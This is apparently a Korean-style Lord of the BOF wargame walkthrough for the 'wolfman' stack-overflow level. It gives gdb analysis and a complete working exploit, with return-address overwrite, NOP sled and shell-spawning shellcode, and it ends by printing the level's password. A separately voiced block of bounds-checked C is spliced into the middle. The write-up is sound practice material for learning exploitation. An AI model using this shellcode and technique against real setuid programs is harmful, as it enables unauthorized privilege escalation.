LOB_orc
```
[orc@localhost orc]$ bash2
[orc@localhost orc]$ cat wolfman.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - wolfman
        - egghunter + buffer hunter
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
	char buffer[40];
	int i;

	if(argc < 2){
		printf("argv error\n");
		exit(0);
	}

	// egghunter
	for(i=0; environ[i]; i++)
		memset(environ[i], 0, strlen(environ[i]));

	if(argv[1][47] != '\xbf')
	{
		printf("stack is still your friend.\n");
		exit(0);
	}

	strcpy(buffer, argv[1]);
	printf("%s\n", buffer);

	// buffer hunter
	memset(buffer, 0, 40);
}
```
After launching bash2 and looking at the hint, a part called "buffer hunter" has been added.
It uses memset to zero out the 40-byte buffer right after it is printed.
This one shouldn't be hard either; using argv[2] should work again.
First, let's analyze it with gdb and then draw the memory layout.
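As an added illustration from the defender's side (this is my own example code, not part of the original post or of the LOB challenge files), here is how the strcpy(buffer, argv[1]) call in wolfman.c looks with a length check in front of it. The names copy_arg_checked, run_check and run_check_repeat and the return codes are this example's own; the 40-byte buffer and the 48-byte argument length come from the post.

```c
/* Added example (not from the original post or the LOB files): the
 * strcpy(buffer, argv[1]) in wolfman.c replaced by a bounds-checked copy.
 * Helper names and return codes are this example's own choices. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_LEN 40   /* same buffer size as wolfman.c */

enum copy_result { COPY_OK = 0, COPY_TOO_LONG = 1, COPY_BAD_ARG = 2 };

/* Copy src into dst only if it fits in dst_len bytes including the
 * terminating NUL. On failure nothing is written, so an over-long
 * argument can never reach the saved frame pointer or return address
 * that sit just above buffer on the stack. */
enum copy_result copy_arg_checked(char *dst, size_t dst_len, const char *src)
{
    if (dst == NULL || src == NULL || dst_len == 0)
        return COPY_BAD_ARG;

    /* memchr looks at most dst_len bytes: if no NUL is found within that
     * window the string is too long, and we never scan past the window. */
    const char *nul = memchr(src, '\0', dst_len);
    if (nul == NULL)
        return COPY_TOO_LONG;

    size_t n = (size_t)(nul - src);   /* n <= dst_len - 1 */
    memcpy(dst, src, n + 1);          /* includes the NUL */
    return COPY_OK;
}

/* Same shape as wolfman's main(): copy, print, then clear the buffer.
 * Returns the check result so a caller (or test) can inspect it. */
enum copy_result run_check(const char *arg)
{
    char buffer[BUF_LEN];
    enum copy_result r = copy_arg_checked(buffer, sizeof buffer, arg);

    if (r == COPY_OK)
        printf("%s\n", buffer);
    else
        fprintf(stderr, "argument rejected: %s\n",
                r == COPY_TOO_LONG ? "too long" : "bad argument");

    memset(buffer, 0, sizeof buffer);   /* the "buffer hunter" step */
    return r;
}

/* Constructed input: a string of `count` copies of `c`, standing in for
 * the perl -e 'print "A"x48' style arguments used in the post. */
enum copy_result run_check_repeat(char c, size_t count)
{
    char *s = malloc(count + 1);
    if (s == NULL)
        return COPY_BAD_ARG;
    memset(s, c, count);
    s[count] = '\0';
    enum copy_result r = run_check(s);
    free(s);
    return r;
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        printf("argv error\n");
        return 1;
    }
    return run_check(argv[1]) == COPY_OK ? 0 : 1;
}
```

Compile with gcc and run it with an argument: anything of 40 bytes or more is rejected before a single byte is written, so the 44 filler bytes plus return address that the post's payload relies on never reach SFP or RET. The check is done with memchr over a window the size of the destination rather than strlen on the whole argument, so the length of the attacker-controlled string never matters to the copy.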
```
(gdb) disas main
Dump of assembler code for function main:
0x8048500 <main>:       push   %ebp
0x8048501 <main+1>:     mov    %esp,%ebp
0x8048503 <main+3>:     sub    $0x2c,%esp
…omitted…
0x80485b6 <main+182>:   mov    (%eax),%edx
0x80485b8 <main+184>:   push   %edx
0x80485b9 <main+185>:   lea    0xffffffd8(%ebp),%eax
0x80485bc <main+188>:   push   %eax
0x80485bd <main+189>:   call   0x8048440 <strcpy>
…omitted…
```
You can see it reserves 0x2c (44 bytes) of stack space: 40 bytes for buffer plus 4 for i.
| Stack (high addresses at the top) | Size |
|---|---|
| argv[2] | |
| argv[1] | |
| argv[0] | |
| argc | |
| … | |
| RET | 4 bytes |
| SFP | 4 bytes |
| buffer | 40 bytes |
| i | 4 bytes |
At main+189 I'll check edx (the address of argv[1]) and use it to find the address of argv[2].
```
(gdb) b * main+189
Breakpoint 1 at 0x80485bd
(gdb) r `perl -e 'print "\xbf"x48'` `perl -e 'print "A"x50'`
Starting program: /home/orc/tmp/wolfman `perl -e 'print "\xbf"x48'` `perl -e 'print "A"x50'`

Breakpoint 1, 0x80485bd in main ()
(gdb) info reg
eax            0xbffffa40       -1073743296
ecx            0x0      0
edx            0xbffffbda       -1073742886
ebx            0x401081ec       1074823660
esp            0xbffffa34       -1073743308
ebp            0xbffffa68       -1073743256
…omitted…
(gdb) x/40x $edx
0xbffffbda:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffbea:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffbfa:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffc0a:     0x41414100      0x41414141      0x41414141      0x41414141
0xbffffc1a:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffc2a:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffc3a:     0x00414141      0x00000000      0x00000000      0x00000000
…omitted…
```
So the address of argv[2] is 0xbffffc0b. I'll put in a NOP sled and, to leave some slack, attack with 0xbffffc1a!
```
[orc@localhost orc]$ ./wolfman `perl -e 'print "A"x44,"\x1a\xfc\xff\xbf"'` `perl -e 'print "\x90"x20, "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
bash$ id
uid=504(orc) gid=504(orc) euid=505(wolfman) egid=505(wolfman) groups=504(orc)
bash$ my-pass
euid = 505
love eyuna
```
Got the wolfman shell!